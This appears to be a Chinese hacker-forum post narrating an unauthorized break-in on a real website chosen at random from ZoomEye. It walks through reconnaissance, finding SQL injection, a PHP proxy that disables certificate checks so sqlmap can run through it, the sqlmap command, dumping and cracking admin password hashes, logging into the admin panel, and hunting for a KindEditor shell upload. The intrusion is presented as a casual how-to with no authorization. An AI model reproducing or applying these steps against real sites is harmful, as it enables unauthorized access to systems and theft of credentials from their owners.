跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

zoomeye瞎逛找到个站顺手搞定

精选回复

发布于

在zoomeye瞎逛,找到个站,顺手搞搞,到后面还是没能拿下shell,kindeditor编辑器真草….

eu99t1.png
eu99t1.png

信息收集

zoomeye搜到的就是一个IP

eu9R41.png
eu9R41.png

whois就不查了,毛用没有又不是搞服务商…..除了自我安慰,哎
旁站查询走一波:同IP网站查询,C段查询,IP反查域名,C段旁注,旁注工具

eu9f9x.png
eu9f9x.png

我他妈….

eu9h36.jpg
eu9h36.jpg

用ip138查查同IP
域名查iP 域名解析 iP查询网站 iP反查域名 iP反查网站 同一iP网站 同iP网站域名iP查询

euCV2V.png
euCV2V.png

域名全部ping了一遍…发现一个域名不是同一个IP,超级ping了一下,发现在山西有个节点

euC5in.png
euC5in.png

端口扫描了一波,发现有节点的那个域名出现在443端口,估计是多个域名解析到同一个DNS

euCzJ1.png
euCzJ1.png

7kb扫描工具一顿扫,没扫出来

euATDf.png
euATDf.png

。。。

eu9h36.jpg
eu9h36.jpg

打开这个站一看,后台光明正大的写在主页

euEV2R.md.png
euEV2R.md.png

。。。

eu9h36.jpg
eu9h36.jpg

整理了一下收集到的信息

euZkcR.png
euZkcR.png

随便点了一下链接发现有类似&id=的url,测试了一下注入,发现SQL注入

euEgs0.png
euEgs0.png

当时就想着扔sqlmap里面跑,然后sqlmap报错。。后面想了一下这个的https证书是有问题的,还有就是sqlmap跑类似于以下的url会发神经

http://test.com/test.php?user=demo&id=1
  • 1
euEzJH.png
euEzJH.png

https证书有问题

euViOP.png
euViOP.png

百思不得其解的时候,搜到了篇文章
sqlmap在https情况下的一个错误 | MSAREHERE
文章的作者使用在本地写了个php,然后使用curl配置屏蔽掉https错误,然后在通过curl发送数据给目标站点

<?php

$url = "http://xxx.com";
$sql = $_GET[s];
$s = urlencode($sql);
$url = $url.$sql;
echo $url;
// $params = "email=$s&password=aa";
//echo $params;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($ch, CURLOPT_TIMEOUT, 15);

// curl_setopt($ch, CURLOPT_POST, 1);    // post 提交方式
// curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

$output = curl_exec($ch);
curl_close($ch);
echo $output;
$a = strlen($output);
echo $a;
?>
  •  

本地访问了一下还真的ok

euVJkF.png
euVJkF.png

然后直接扔sqlmap跑就ok

sqlmap -u http://127.0.0.1/demos.php?s=%20*
  • 1
euValR.png
euValR.png

然后发现不是dba权限

euVfXt.png
euVfXt.png

dump出后台的hash发现还有两个跑不出

eu9h36.jpg
eu9h36.jpg

还好最后一个hash跑出来了

euVI78.png
euVI78.png

得到用户名密码

euZVnx.png
euZVnx.png

后台一登陆,看见编辑器kindeditor

euZsuq.png
euZsuq.png

google搜了一遍,发现只能重命名或者备份getshell

eu9h36.jpg
eu9h36.jpg

[渗透实战]某铸造设备公司官网经典思路 - DYBOY - 专注程序开发与信息安全

原本打算子域名看看能不能搞的,查出来的都是什么

eueV2j.png

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。